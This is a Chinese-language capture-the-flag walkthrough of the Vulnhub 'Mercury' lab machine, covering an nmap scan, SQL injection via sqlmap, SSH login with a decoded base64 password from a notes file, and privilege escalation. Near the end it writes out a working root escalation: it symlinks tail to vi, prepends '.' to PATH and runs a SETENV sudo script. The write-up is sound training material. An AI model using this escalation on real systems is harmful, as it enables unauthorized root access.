前期探测
由于之前那台[[narak]]靶机让我更加重视udp扫描
发现主机
在设置net模式并重启后还是扫不到
于是去查了一下
扫不到的解决方法[[Vulnhub靶机检测不到IP地址|Vulnhub靶机检测不到IP地址]]
改好后
常规扫描端口
端口深度扫描
(说实话长度有点吓到我了)
┌──(kali㉿kali)-[~/mercury]
└─$ sudo nmap -sT -sV -sC -O -p22,8080 192.168.92.135 -oA mercury
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-23 05:44 EDT
Nmap scan report for 192.168.92.135
Host is up (0.00043s latency).PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 c8:24:ea:2a:2b:f1:3c:fa:16:94:65:bd:c7:9b:6c:29 (RSA)
| 256 e8:08:a1:8e:7d:5a:bc:5c:66:16:48:24:57:0d:fa:b8 (ECDSA)
|_ 256 2f:18:7e:10:54:f7:b9:17:a2:11:1d:8f:b3:30:a5:2a (ED25519)
8080/tcp open http-proxy WSGIServer/0.2 CPython/3.8.2
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
|_http-server-header: WSGIServer/0.2 CPython/3.8.2
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 404 Not Found
| Date: Mon, 23 Oct 2023 09:44:22 GMT
| Server: WSGIServer/0.2 CPython/3.8.2
| Content-Type: text/html
| X-Frame-Options: DENY
| Content-Length: 2366
| X-Content-Type-Options: nosniff
| Referrer-Policy: same-origin
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta http-equiv="content-type" content="text/html; charset=utf-8">
| <title>Page not found at /nice ports,/Trinity.txt.bak</title>
| <meta name="robots" content="NONE,NOARCHIVE">
| <style type="text/css">
| html * { padding:0; margin:0; }
| body * { padding:10px 20px; }
| body * * { padding:0; }
| body { font:small sans-serif; background:#eee; color:#000; }
| body>div { border-bottom:1px solid #ddd; }
| font-weight:normal; margin-bottom:.4em; }
| span { font-size:60%; color:#666; font-weight:normal; }
| table { border:none; border-collapse: collapse; width:100%; }
| vertical-align:
| GetRequest, HTTPOptions:
| HTTP/1.1 200 OK
| Date: Mon, 23 Oct 2023 09:44:22 GMT
| Server: WSGIServer/0.2 CPython/3.8.2
| Content-Type: text/html; charset=utf-8
| X-Frame-Options: DENY
| Content-Length: 69
| X-Content-Type-Options: nosniff
| Referrer-Policy: same-origin
| Hello. This site is currently in development please check back later.
| RTSPRequest:
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
| "http://www.w3.org/TR/html4/strict.dtd">
| <html>
| <head>
| <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
| <title>Error response</title>
| </head>
| <body>
| <h1>Error response</h1>
| <p>Error code: 400</p>
| <p>Message: Bad request version ('RTSP/1.0').</p>
| <p>Error code explanation: HTTPStatus.BAD_REQUEST - Bad request syntax or unsupported method.</p>
| </body>
|_ </html>
| http-robots.txt: 1 disallowed entry
|_/
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.94%I=7%D=10/23%Time=65364076%P=x86_64-pc-linux-gnu%r(G
SF:etRequest,135,"HTTP/1\.1\x20200\x20OK\r\nDate:\x20Mon,\x2023\x20Oct\x20
SF:2023\x2009:44:22\x20GMT\r\nServer:\x20WSGIServer/0\.2\x20CPython/3\.8\.
SF:2\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nX-Frame-Options:\x
SF:20DENY\r\nContent-Length:\x2069\r\nX-Content-Type-Options:\x20nosniff\r
SF:\nReferrer-Policy:\x20same-origin\r\n\r\nHello\.\x20This\x20site\x20is\
SF:x20currently\x20in\x20development\x20please\x20check\x20back\x20later\.
SF:")%r(HTTPOptions,135,"HTTP/1\.1\x20200\x20OK\r\nDate:\x20Mon,\x2023\x20
SF:Oct\x202023\x2009:44:22\x20GMT\r\nServer:\x20WSGIServer/0\.2\x20CPython
SF:/3\.8\.2\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nX-Frame-Opt
SF:ions:\x20DENY\r\nContent-Length:\x2069\r\nX-Content-Type-Options:\x20no
SF:sniff\r\nReferrer-Policy:\x20same-origin\r\n\r\nHello\.\x20This\x20site
SF:\x20is\x20currently\x20in\x20development\x20please\x20check\x20back\x20
SF:later\.")%r(RTSPRequest,1F4,"<!DOCTYPE\x20HTML\x20PUBLIC\x20\"-//W3C//D
SF:TD\x20HTML\x204\.01//EN\"\n\x20\x20\x20\x20\x20\x20\x20\x20\"http://www
SF:\.w3\.org/TR/html4/strict\.dtd\">\n<html>\n\x20\x20\x20\x20<head>\n\x20
SF:\x20\x20\x20\x20\x20\x20\x20<meta\x20http-equiv=\"Content-Type\"\x20con
SF:tent=\"text/html;charset=utf-8\">\n\x20\x20\x20\x20\x20\x20\x20\x20<tit
SF:le>Error\x20response</title>\n\x20\x20\x20\x20</head>\n\x20\x20\x20\x20
SF:<body>\n\x20\x20\x20\x20\x20\x20\x20\x20<h1>Error\x20response</h1>\n\x2
SF:0\x20\x20\x20\x20\x20\x20\x20<p>Error\x20code:\x20400</p>\n\x20\x20\x20
SF:\x20\x20\x20\x20\x20<p>Message:\x20Bad\x20request\x20version\x20\('RTSP
SF:/1\.0'\)\.</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Error\x20code\x20exp
SF:lanation:\x20HTTPStatus\.BAD_REQUEST\x20-\x20Bad\x20request\x20syntax\x
SF:20or\x20unsupported\x20method\.</p>\n\x20\x20\x20\x20</body>\n</html>\n
SF:")%r(FourOhFourRequest,A28,"HTTP/1\.1\x20404\x20Not\x20Found\r\nDate:\x
SF:20Mon,\x2023\x20Oct\x202023\x2009:44:22\x20GMT\r\nServer:\x20WSGIServer
SF:/0\.2\x20CPython/3\.8\.2\r\nContent-Type:\x20text/html\r\nX-Frame-Optio
SF:ns:\x20DENY\r\nContent-Length:\x202366\r\nX-Content-Type-Options:\x20no
SF:sniff\r\nReferrer-Policy:\x20same-origin\r\n\r\n<!DOCTYPE\x20html>\n<ht
SF:ml\x20lang=\"en\">\n<head>\n\x20\x20<meta\x20http-equiv=\"content-type\
SF:"\x20content=\"text/html;\x20charset=utf-8\">\n\x20\x20<title>Page\x20n
SF:ot\x20found\x20at\x20/nice\x20ports,/Trinity\.txt\.bak</title>\n\x20\x2
SF:0<meta\x20name=\"robots\"\x20content=\"NONE,NOARCHIVE\">\n\x20\x20<styl
SF:e\x20type=\"text/css\">\n\x20\x20\x20\x20html\x20\*\x20{\x20padding:0;\
SF:x20margin:0;\x20}\n\x20\x20\x20\x20body\x20\*\x20{\x20padding:10px\x202
SF:0px;\x20}\n\x20\x20\x20\x20body\x20\*\x20\*\x20{\x20padding:0;\x20}\n\x
SF:20\x20\x20\x20body\x20{\x20font:small\x20sans-serif;\x20background:#eee
SF:;\x20color:#000;\x20}\n\x20\x20\x20\x20body>div\x20{\x20border-bottom:1
SF:px\x20solid\x20#ddd;\x20}\n\x20\x20\x20\x20h1\x20{\x20font-weight:norma
SF:l;\x20margin-bottom:\.4em;\x20}\n\x20\x20\x20\x20h1\x20span\x20{\x20fon
SF:t-size:60%;\x20color:#666;\x20font-weight:normal;\x20}\n\x20\x20\x20\x2
SF:0table\x20{\x20border:none;\x20border-collapse:\x20collapse;\x20width:1
SF:00%;\x20}\n\x20\x20\x20\x20td,\x20th\x20{\x20vertical-align:");
MAC Address: 00:0C:29:3B:94:8D (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.71 seconds
udp扫描
只发现68端口开放
脚本扫描
尝试8080端口
啥都没有,尝试
扫描目录
尝试访问robots.txt发现啥都没有
到这里我就没思路了
接下来就是查阅相关资料
资料中说尝试是否开启DEBUG,需要随便尝试一个错误url
在第三点中似乎有一个目录,尝试一下
只有一张月亮照片和两个按钮
尝试一下
只有这些东西
但是资料上显示
http://192.168.92.135:8080/mercuryfacts/3/
存在sql
sql注入
于是尝试sqlmap
拿到用户
剩下只有ssh可以使用
尝试ssh连接
在尝试到最后一个是发现可以进入
(其实试到这里是已经没希望了)
拿到第一个flag
接下来尝试提权
sudo #sh文件提权
┌──(kali㉿kali)-[~/redteamnotes/mercury]
└─$ sudo ssh webmaster@192.168.92.135
[sudo] kali 的密码:
The authenticity of host '192.168.92.135 (192.168.92.135)' can't be established.
ED25519 key fingerprint is SHA256:mHhkDLhyH54cYFlptygnwr7NYpEtepsNhVAT8qzqcUk.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.92.135' (ED25519) to the list of known hosts.webmaster@192.168.92.135's password:
Permission denied, please try again.
webmaster@192.168.92.135's password:
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-45-generic x86_64)* Documentation: https://help.ubuntu.com* Management: https://landscape.canonical.com* Support: https://ubuntu.com/advantageSystem information as of Wed 8 Nov 13:34:22 UTC 2023System load: 0.06 Processes: 196Usage of /: 70.7% of 4.86GB Users logged in: 0Memory usage: 27% IPv4 address for ens33: 192.168.92.135Swap usage: 0%* Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8sjust raised the bar for easy, resilient and secure K8s cluster deployment.https://ubuntu.com/engage/secure-kubernetes-at-the-edge381 updates can be installed immediately.
267 of these updates are security updates.
To see these additional updates run: apt list --upgradableThe list of available updates is more than a week old.
To check for new updates run: sudo apt updateLast login: Mon Oct 23 13:26:49 2023 from 192.168.92.130
webmaster@mercury:~$ whoami
webmaster
webmaster@mercury:~$ uname -a
Linux mercury 5.4.0-45-generic #49-Ubuntu SMP Wed Aug 26 13:38:52 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
webmaster@mercury:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00inet 127.0.0.1/8 scope host lovalid_lft forever preferred_lft foreverinet6 ::1/128 scope host valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000link/ether 00:0c:29:43:38:cf brd ff:ff:ff:ff:ff:ffinet 192.168.92.135/24 brd 192.168.92.255 scope global dynamic ens33valid_lft 1388sec preferred_lft 1388secinet6 fe80::20c:29ff:fe43:38cf/64 scope link valid_lft forever preferred_lft forever
webmaster@mercury:~$ ls
mercury_proj user_flag.txt
webmaster@mercury:~$ cd mercury_proj/
webmaster@mercury:~/mercury_proj$ ls
db.sqlite3 mercury_facts mercury_proj
manage.py mercury_index notes.txt
webmaster@mercury:~/mercury_proj$ cat notes.txt
Project accounts (both restricted):
webmaster for web stuff - webmaster:bWVyY3VyeWlzdGhlc2l6ZW9mMC4wNTZFYXJ0aHMK
linuxmaster for linux stuff - linuxmaster:bWVyY3VyeW1lYW5kaWFtZXRlcmlzNDg4MGttCg==
webmaster@mercury:~/mercury_proj$ echo bWVyY3VyeW1lYW5kaWFtZXRlcmlzNDg4MGttCg== | base64 -d
mercurymeandiameteris4880km
webmaster@mercury:~/mercury_proj$ su linuxmaster
Password:
linuxmaster@mercury:/home/webmaster/mercury_proj$ whoami
linuxmaster
linuxmaster@mercury:/home/webmaster/mercury_proj$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00inet 127.0.0.1/8 scope host lovalid_lft forever preferred_lft foreverinet6 ::1/128 scope host valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000link/ether 00:0c:29:43:38:cf brd ff:ff:ff:ff:ff:ffinet 192.168.92.135/24 brd 192.168.92.255 scope global dynamic ens33valid_lft 1250sec preferred_lft 1250secinet6 fe80::20c:29ff:fe43:38cf/64 scope link valid_lft forever preferred_lft forever
linuxmaster@mercury:/home/webmaster/mercury_proj$ ls
db.sqlite3 mercury_facts mercury_proj
manage.py mercury_index notes.txt
linuxmaster@mercury:/home/webmaster/mercury_proj$ cd
linuxmaster@mercury:~$ sudo -l
[sudo] password for linuxmaster:
Matching Defaults entries for linuxmaster on mercury:env_reset, mail_badpass,secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/binUser linuxmaster may run the following commands on mercury:(root : root) SETENV: /usr/bin/check_syslog.sh
linuxmaster@mercury:~$ cat /usr/bin/check_syslog.sh
#!/bin/bash
tail -n 10 /var/log/syslog
linuxmaster@mercury:~$ ln -s /bin/vi tail
linuxmaster@mercury:~$ ls -liah
total 24K
162165 drwx------ 3 linuxmaster linuxmaster 4.0K Nov 8 13:38 .18 drwxr-xr-x 5 root root 4.0K Aug 28 2020 ..
165762 lrwxrwxrwx 1 linuxmaster linuxmaster 9 Sep 1 2020 .bash_history -> /dev/null
165896 -rw-r--r-- 1 linuxmaster linuxmaster 220 Aug 28 2020 .bash_logout
162221 -rw-r--r-- 1 linuxmaster linuxmaster 3.7K Aug 28 2020 .bashrc
165920 drwx------ 2 linuxmaster linuxmaster 4.0K Aug 28 2020 .cache
166244 -rw-r--r-- 1 linuxmaster linuxmaster 807 Aug 28 2020 .profile
162215 lrwxrwxrwx 1 linuxmaster linuxmaster 7 Nov 8 13:38 tail -> /bin/vi
linuxmaster@mercury:~$ export PATH=.:$PATH
linuxmaster@mercury:~$ echo $PATH
.:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games
linuxmaster@mercury:~$ sudo --preserve-env=PATH /usr/bin/check_syslog.sh
2 files to editroot@mercury:/home/linuxmaster# whoami
root
root@mercury:/home/linuxmaster# uname -a
Linux mercury 5.4.0-45-generic #49-Ubuntu SMP Wed Aug 26 13:38:52 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
root@mercury:/home/linuxmaster# ls
tail
root@mercury:/home/linuxmaster# cd
root@mercury:~# ls
root_flag.txt
root@mercury:~# cat root_flag.txt
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@/##////////@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@(((/(*(/((((((////////&@@@@@@@@@@@@@
@@@@@@@@@@@((#(#(###((##//(((/(/(((*((//@@@@@@@@@@
@@@@@@@@/#(((#((((((/(/,*/(((///////(/*/*/#@@@@@@@
@@@@@@*((####((///*//(///*(/*//((/(((//**/((&@@@@@
@@@@@/(/(((##/*((//(#(////(((((/(///(((((///(*@@@@
@@@@/(//((((#(((((*///*/(/(/(((/((////(/*/*(///@@@
@@@//**/(/(#(#(##((/(((((/(**//////////((//((*/#@@
@@@(//(/((((((#((((#*/((///((///((//////(/(/(*(/@@
@@@((//((((/((((#(/(/((/(/(((((#((((((/(/((/////@@
@@@(((/(((/##((#((/*///((/((/((##((/(/(/((((((/*@@
@@@(((/(##/#(((##((/((((((/(##(/##(#((/((((#((*%@@
@@@@(///(#(((((#(#(((((#(//((#((###((/(((((/(//@@@
@@@@@(/*/(##(/(###(((#((((/((####/((((///((((/@@@@
@@@@@@%//((((#############((((/((/(/(*/(((((@@@@@@
@@@@@@@@%#(((############(##((#((*//(/(*//@@@@@@@@
@@@@@@@@@@@/(#(####(###/((((((#(///((//(@@@@@@@@@@
@@@@@@@@@@@@@@@(((###((#(#(((/((///*@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@%#(#%@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@Congratulations on completing Mercury!!!
If you have any feedback please contact me at SirFlash@protonmail.com
[root_flag_69426d9fda579afbffd9c2d47ca31d90]
root@mercury:~#
搞定收工